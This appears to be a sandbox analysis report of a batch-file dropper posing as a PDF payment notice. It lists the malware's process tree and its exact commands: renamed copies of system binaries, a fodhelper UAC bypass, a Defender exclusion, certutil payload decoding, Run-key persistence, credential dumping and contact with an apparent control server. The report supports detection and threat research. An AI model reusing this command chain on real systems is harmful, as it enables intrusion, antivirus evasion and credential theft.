N/A N/A C:\Windows \System32\7343994.exe N/A

Accesses Microsoft Outlook accounts

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts C:\Windows\SysWOW64\colorcpl.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Koomxsve = "C:\\Users\\Public\\Koomxsve.url" C:\Users\Public\Libraries\Lewxa.com N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1396 set thread context of 224 N/A C:\Windows\SysWOW64\colorcpl.exe C:\Windows\SysWOW64\colorcpl.exe
PID 1396 set thread context of 5008 N/A C:\Windows\SysWOW64\colorcpl.exe C:\Windows\SysWOW64\colorcpl.exe
PID 1396 set thread context of 4544 N/A C:\Windows\SysWOW64\colorcpl.exe C:\Windows\SysWOW64\colorcpl.exe

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\colorcpl.exe

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\\Users " C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\ms-settings\shell\open\command C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\ms-settings C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\ms-settings\shell C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\ms-settings\shell\open C:\Windows\system32\reg.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\colorcpl.exe N/A
N/A N/A C:\Windows\SysWOW64\colorcpl.exe N/A
N/A N/A C:\Windows\SysWOW64\colorcpl.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Public\xkn.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\colorcpl.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\colorcpl.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4564 wrote to memory of 4044 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4564 wrote to memory of 4044 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4044 wrote to memory of 1272 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\extrac32.exe
PID 4044 wrote to memory of 1272 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\extrac32.exe
PID 4564 wrote to memory of 2948 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 4564 wrote to memory of 2948 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 2948 wrote to memory of 4892 N/A C:\Users\Public\alpha.exe C:\Windows\system32\extrac32.exe
PID 2948 wrote to memory of 4892 N/A C:\Users\Public\alpha.exe C:\Windows\system32\extrac32.exe
PID 4564 wrote to memory of 2428 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 4564 wrote to memory of 2428 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 2428 wrote to memory of 1160 N/A C:\Users\Public\alpha.exe C:\Windows\system32\extrac32.exe
PID 2428 wrote to memory of 1160 N/A C:\Users\Public\alpha.exe C:\Windows\system32\extrac32.exe
PID 4564 wrote to memory of 2140 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 4564 wrote to memory of 2140 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 2140 wrote to memory of 3792 N/A C:\Users\Public\alpha.exe C:\Users\Public\xkn.exe
PID 2140 wrote to memory of 3792 N/A C:\Users\Public\alpha.exe C:\Users\Public\xkn.exe
PID 3792 wrote to memory of 628 N/A C:\Users\Public\xkn.exe C:\Users\Public\alpha.exe
PID 3792 wrote to memory of 628 N/A C:\Users\Public\xkn.exe C:\Users\Public\alpha.exe
PID 628 wrote to memory of 5004 N/A C:\Users\Public\alpha.exe C:\Windows\system32\reg.exe
PID 628 wrote to memory of 5004 N/A C:\Users\Public\alpha.exe C:\Windows\system32\reg.exe
PID 3792 wrote to memory of 4988 N/A C:\Users\Public\xkn.exe C:\Windows\system32\fodhelper.exe
PID 3792 wrote to memory of 4988 N/A C:\Users\Public\xkn.exe C:\Windows\system32\fodhelper.exe
PID 4564 wrote to memory of 3544 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 4564 wrote to memory of 3544 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 3544 wrote to memory of 2844 N/A C:\Users\Public\alpha.exe C:\Users\Public\kn.exe
PID 3544 wrote to memory of 2844 N/A C:\Users\Public\alpha.exe C:\Users\Public\kn.exe
PID 4564 wrote to memory of 2032 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 4564 wrote to memory of 2032 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 2032 wrote to memory of 4992 N/A C:\Users\Public\alpha.exe C:\Users\Public\kn.exe
PID 2032 wrote to memory of 4992 N/A C:\Users\Public\alpha.exe C:\Users\Public\kn.exe
PID 4564 wrote to memory of 1000 N/A C:\Windows\system32\cmd.exe C:\Users\Public\Libraries\Lewxa.com
PID 4564 wrote to memory of 1000 N/A C:\Windows\system32\cmd.exe C:\Users\Public\Libraries\Lewxa.com
PID 4564 wrote to memory of 1000 N/A C:\Windows\system32\cmd.exe C:\Users\Public\Libraries\Lewxa.com
PID 4564 wrote to memory of 3960 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 4564 wrote to memory of 3960 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 4564 wrote to memory of 4100 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 4564 wrote to memory of 4100 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 4564 wrote to memory of 1712 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 4564 wrote to memory of 1712 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 4564 wrote to memory of 1852 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 4564 wrote to memory of 1852 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 4564 wrote to memory of 864 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 4564 wrote to memory of 864 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 864 wrote to memory of 1376 N/A C:\Users\Public\alpha.exe C:\Windows\system32\taskkill.exe
PID 864 wrote to memory of 1376 N/A C:\Users\Public\alpha.exe C:\Windows\system32\taskkill.exe
PID 4564 wrote to memory of 3644 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 4564 wrote to memory of 3644 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 3644 wrote to memory of 552 N/A C:\Users\Public\alpha.exe C:\Windows\system32\taskkill.exe
PID 3644 wrote to memory of 552 N/A C:\Users\Public\alpha.exe C:\Windows\system32\taskkill.exe
PID 1000 wrote to memory of 2484 N/A C:\Users\Public\Libraries\Lewxa.com C:\Windows\SysWOW64\cmd.exe
PID 1000 wrote to memory of 2484 N/A C:\Users\Public\Libraries\Lewxa.com C:\Windows\SysWOW64\cmd.exe
PID 1000 wrote to memory of 2484 N/A C:\Users\Public\Libraries\Lewxa.com C:\Windows\SysWOW64\cmd.exe
PID 1000 wrote to memory of 3356 N/A C:\Users\Public\Libraries\Lewxa.com C:\Windows\SysWOW64\cmd.exe
PID 1000 wrote to memory of 3356 N/A C:\Users\Public\Libraries\Lewxa.com C:\Windows\SysWOW64\cmd.exe
PID 1000 wrote to memory of 3356 N/A C:\Users\Public\Libraries\Lewxa.com C:\Windows\SysWOW64\cmd.exe
PID 1000 wrote to memory of 1308 N/A C:\Users\Public\Libraries\Lewxa.com C:\Windows\SysWOW64\cmd.exe
PID 1000 wrote to memory of 1308 N/A C:\Users\Public\Libraries\Lewxa.com C:\Windows\SysWOW64\cmd.exe
PID 1000 wrote to memory of 1308 N/A C:\Users\Public\Libraries\Lewxa.com C:\Windows\SysWOW64\cmd.exe
PID 1308 wrote to memory of 1456 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows \System32\7343994.exe
PID 1308 wrote to memory of 1456 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows \System32\7343994.exe
PID 1456 wrote to memory of 736 N/A C:\Windows \System32\7343994.exe C:\Windows\system32\cmd.exe
PID 1456 wrote to memory of 736 N/A C:\Windows \System32\7343994.exe C:\Windows\system32\cmd.exe
PID 736 wrote to memory of 864 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 736 wrote to memory of 864 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\DEBIT_ADVICE_000610PAY001522024.PDF.bat"

C:\Windows\system32\cmd.exe

cmd /c extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe

C:\Windows\system32\extrac32.exe

extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe

C:\Windows\system32\extrac32.exe

extrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe

C:\Windows\system32\extrac32.exe

extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "

C:\Users\Public\xkn.exe

C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "

C:\Users\Public\alpha.exe

"C:\Users\Public\alpha.exe" /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "

C:\Windows\system32\reg.exe

reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "

C:\Windows\system32\fodhelper.exe

"C:\Windows\system32\fodhelper.exe"

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\DEBIT_ADVICE_000610PAY001522024.PDF.bat" "C:\\Users\\Public\\Lewxa.txt" 9

C:\Users\Public\kn.exe

C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\DEBIT_ADVICE_000610PAY001522024.PDF.bat" "C:\\Users\\Public\\Lewxa.txt" 9

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Lewxa.txt" "C:\\Users\\Public\\Libraries\\Lewxa.com" 12

C:\Users\Public\kn.exe

C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Lewxa.txt" "C:\\Users\\Public\\Libraries\\Lewxa.com" 12

C:\Users\Public\Libraries\Lewxa.com

C:\\Users\\Public\\Libraries\\Lewxa.com

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c del "C:\Users\Public\Lewxa" / A / F / Q / S

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c del "C:\Users\Public\Lewxa.txt" / A / F / Q / S

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c del "C:\Users\Public\xkn.exe" / A / F / Q / S

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c del "C:\Users\Public\kn.exe" / A / F / Q / S

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM SystemSettings.exe

C:\Windows\system32\SystemSettingsAdminFlows.exe

"C:\Windows\system32\SystemSettingsAdminFlows.exe" OptionalFeaturesAdminHelper

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettingsAdminFlows.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM SystemSettingsAdminFlows.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c mkdir "\\?\C:\Windows "

C:\Windows\SysWOW64\cmd.exe

cmd /c mkdir "\\?\C:\Windows \System32"

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Windows \System32\7343994.exe"

C:\Windows \System32\7343994.exe

"C:\Windows \System32\7343994.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\windows \system32\KDECO.bat""

C:\Windows\system32\cmd.exe

cmd /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"

C:\Windows\SysWOW64\extrac32.exe

C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Public\Libraries\Lewxa.com C:\\Users\\Public\\Libraries\\Koomxsve.PIF

C:\Windows\SysWOW64\colorcpl.exe

C:\Windows\System32\colorcpl.exe

C:\Windows\SysWOW64\colorcpl.exe

C:\Windows\SysWOW64\colorcpl.exe /stext "C:\Users\Admin\AppData\Local\Temp\cvmkexyxwegevgpvebjivyygouc"

C:\Windows\SysWOW64\colorcpl.exe

C:\Windows\SysWOW64\colorcpl.exe /stext "C:\Users\Admin\AppData\Local\Temp\fprcfpiykmyjfvlznldkyllxpiuqfd"

C:\Windows\SysWOW64\colorcpl.exe

C:\Windows\SysWOW64\colorcpl.exe /stext "C:\Users\Admin\AppData\Local\Temp\prevghtsyurwibzdxwqdjpggypdrgoxekg"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1396 -ip 1396

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1396 -s 1524

Network

Country Destination Domain Proto
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 173.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 cxcs.microsoft.net udp
GB 2.20.37.224:443 cxcs.microsoft.net tcp
US 8.8.8.8:53 224.37.20.2.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 1010.filemail.com udp
US 23.237.50.106:443 1010.filemail.com tcp
US 23.237.50.106:443 1010.filemail.com tcp
US 8.8.8.8:53 106.50.237.23.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 100.5.17.2.in-addr.arpa udp
US 8.8.8.8:53 119.110.54.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 174.178.17.96.in-addr.arpa udp
N/A 127.0.0.1:45671 tcp
N/A 127.0.0.1:55677 tcp
US 8.8.8.8:53 176.178.17.96.in-addr.arpa udp
US 192.3.101.8:55677 tcp
US 8.8.8.8:53 8.101.3.192.in-addr.arpa udp
US 8.8.8.8:53 geoplugin.net udp
NL 178.237.33.50:80 geoplugin.net tcp
US 192.3.101.8:55677 tcp
US 8.8.8.8:53 50.33.237.178.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 186.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 217.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 55.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 17.134.221.88.in-addr.arpa udp
GB 96.17.179.55:80 tcp

Files

C:\Users\Public\alpha.exe

MD5 8a2122e8162dbef04694b9c3e0b6cdee
SHA1 f1efb0fddc156e4c61c5f78a54700e4e7984d55d
SHA256 b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450
SHA512 99e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397

C:\Users\Public\xkn.exe

MD5 04029e121a0cfa5991749937dd22a1d9
SHA1 f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA256 9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA512 6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

memory/3792-17-0x00000172FE180000-0x00000172FE1A2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_d0v2il1s.f1k.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3792-27-0x00007FF9B0880000-0x00007FF9B1341000-memory.dmp

memory/3792-28-0x00000172FE520000-0x00000172FE530000-memory.dmp

memory/3792-29-0x00000172FE520000-0x00000172FE530000-memory.dmp

memory/3792-34-0x00007FF9B0880000-0x00007FF9B1341000-memory.dmp

C:\Users\Public\kn.exe

MD5 bd8d9943a9b1def98eb83e0fa48796c2
SHA1 70e89852f023ab7cde0173eda1208dbb580f1e4f
SHA256 8de7b4eb1301d6cbe4ea2c8d13b83280453eb64e3b3c80756bbd1560d65ca4d2
SHA512 95630fdddad5db60cc97ec76ee1ca02dbb00ee3de7d6957ecda8968570e067ab2a9df1cc07a3ce61161a994acbe8417c83661320b54d04609818009a82552f7b

C:\Users\Public\Lewxa.txt

MD5 8f6b3132069a25963b93083743e160dd
SHA1 364112fc579f11dfa82a3c1078ec19706cd6dfda
SHA256 5184b2c7c5ffbaf8b8c9bac27545f09447b61d619a2f2bf472570b9ebec5747c
SHA512 af3051aeed9de9931f12d48cd22fef3273f9350a1cdd3c476fa02f7550288f7a96112f311d4dadcf61f0a67c93c22ce2999fb6253c8841b9d399e710b8518938

C:\Users\Public\Libraries\Lewxa.com

MD5 04aba5a372c8dac9affd6f1578b478b3
SHA1 1e0d764539cbf2e86e0d59b83f407b429f61fdb7
SHA256 b27a5e00f3339d8020da21dabc1c53e001bf5d4a809c47cee65f3e9383568411
SHA512 4d69053814b86bd13b59ca8b147a5331d0eace3ed2aaa936dc35086fdba8ef44d757bdc788eec61338f443578f98b8859f8dd7c7eeef486cab9ecb8eb5be15a3

memory/1000-49-0x0000000002320000-0x0000000002321000-memory.dmp

memory/1000-55-0x0000000003F40000-0x0000000004F40000-memory.dmp

memory/1000-56-0x0000000003F40000-0x0000000004F40000-memory.dmp

memory/1000-59-0x0000000000400000-0x0000000000527000-memory.dmp

memory/1000-61-0x0000000002320000-0x0000000002321000-memory.dmp

C:\Windows \System32\7343994.exe

MD5 231ce1e1d7d98b44371ffff407d68b59
SHA1 25510d0f6353dbf0c9f72fc880de7585e34b28ff
SHA256 30951db8bfc21640645aa9144cfeaa294bb7c6980ef236d28552b6f4f3f92a96
SHA512 520887b01bda96b7c4f91b9330a5c03a12f7c7f266d4359432e7bacc76b0eef377c05a4361f8fa80ad0b94b5865699d747a5d94a2d3dcdb85dabf5887bb6c612

C:\Windows \System32\netutils.dll

MD5 fa7aa88417d0c48807144a1a48fe3fbc
SHA1 6f5ec990b12d4a6075050a94e0d68d03781fa46d
SHA256 2019dcd18ba7d5554a4a9da882740aa883941670af3de9396960081a0f8aa098
SHA512 99b2eb6f8e7d00a3803cba229149e5e0cb67a3deb607782c55fbacd25d9c074cce83759de15490eff939d5ad98f26cdbd44395cc79ffe22753e16c3d9e3b5fff

memory/1456-75-0x00000000613C0000-0x00000000613E3000-memory.dmp

C:\windows \system32\KDECO.bat

MD5 c545650595b479c81ad6b9d8882aae39
SHA1 7a98aa2e6eee23b3c1bba876955d525bc618b3f0
SHA256 a3a80983cb33159f0455fa0135789402558baa1460db94d0071318512b8cb5f9
SHA512 85ac596a7da9072a28c4178e4fdedc98f1b49c8e3fe5612cfe464833297b13f65d2dc59b52d7fc9970cff8f98d954111229aec0ed9dded454e03b0cf4ebb6ff3

memory/1812-84-0x000002B0F1360000-0x000002B0F1370000-memory.dmp

memory/1812-83-0x000002B0F1360000-0x000002B0F1370000-memory.dmp

memory/1812-82-0x00007FF9AECB0000-0x00007FF9AF771000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d8b9a260789a22d72263ef3bb119108c
SHA1 376a9bd48726f422679f2cd65003442c0b6f6dd5
SHA256 d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc
SHA512 550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

memory/1812-92-0x00007FF9AECB0000-0x00007FF9AF771000-memory.dmp

memory/1396-99-0x0000000000C00000-0x0000000001C00000-memory.dmp

memory/1396-101-0x0000000000C00000-0x0000000001C00000-memory.dmp

memory/1396-102-0x0000000000C00000-0x0000000001C00000-memory.dmp

memory/1396-103-0x0000000000C00000-0x0000000001C00000-memory.dmp

memory/1396-104-0x0000000000C00000-0x0000000001C00000-memory.dmp

memory/1396-107-0x0000000000C00000-0x0000000001C00000-memory.dmp

memory/1396-109-0x0000000000C00000-0x0000000001C00000-memory.dmp

memory/1396-110-0x0000000000C00000-0x0000000001C00000-memory.dmp

memory/1396-111-0x0000000000C00000-0x0000000001C00000-memory.dmp

memory/1396-112-0x0000000000C00000-0x0000000001C00000-memory.dmp

memory/224-115-0x0000000000400000-0x0000000000478000-memory.dmp

memory/5008-116-0x0000000000400000-0x0000000000462000-memory.dmp

memory/224-119-0x0000000000400000-0x0000000000478000-memory.dmp

memory/5008-121-0x0000000000400000-0x0000000000462000-memory.dmp

memory/4544-120-0x0000000000400000-0x0000000000424000-memory.dmp

memory/224-123-0x0000000000400000-0x0000000000478000-memory.dmp

memory/5008-126-0x0000000000400000-0x0000000000462000-memory.dmp

memory/4544-130-0x0000000000400000-0x0000000000424000-memory.dmp

memory/5008-132-0x0000000000400000-0x0000000000462000-memory.dmp

memory/4544-131-0x0000000000400000-0x0000000000424000-memory.dmp

memory/4544-133-0x0000000000400000-0x0000000000424000-memory.dmp

memory/224-136-0x0000000000400000-0x0000000000478000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\cvmkexyxwegevgpvebjivyygouc

MD5 1e851ac5c5f7c5086508dddc69063a46
SHA1 ec67b2be1b676dc07b54f92b64cabaa8b5c53656
SHA256 0672c1350202839c50058ce7097f6eac6d3788bac87b932f64a6c5f75674eb04
SHA512 e532fb9a86e913de9272d2314bbbf8688e60932e5cb67b8d780a5904545df5ee3a2669b1875c687fe2aa7281198e00b74f6de0d8e3fd9bfac10b0b28b18f5019

memory/1396-138-0x0000000020940000-0x0000000020959000-memory.dmp

memory/1396-141-0x0000000020940000-0x0000000020959000-memory.dmp

memory/1396-143-0x0000000000C00000-0x0000000001C00000-memory.dmp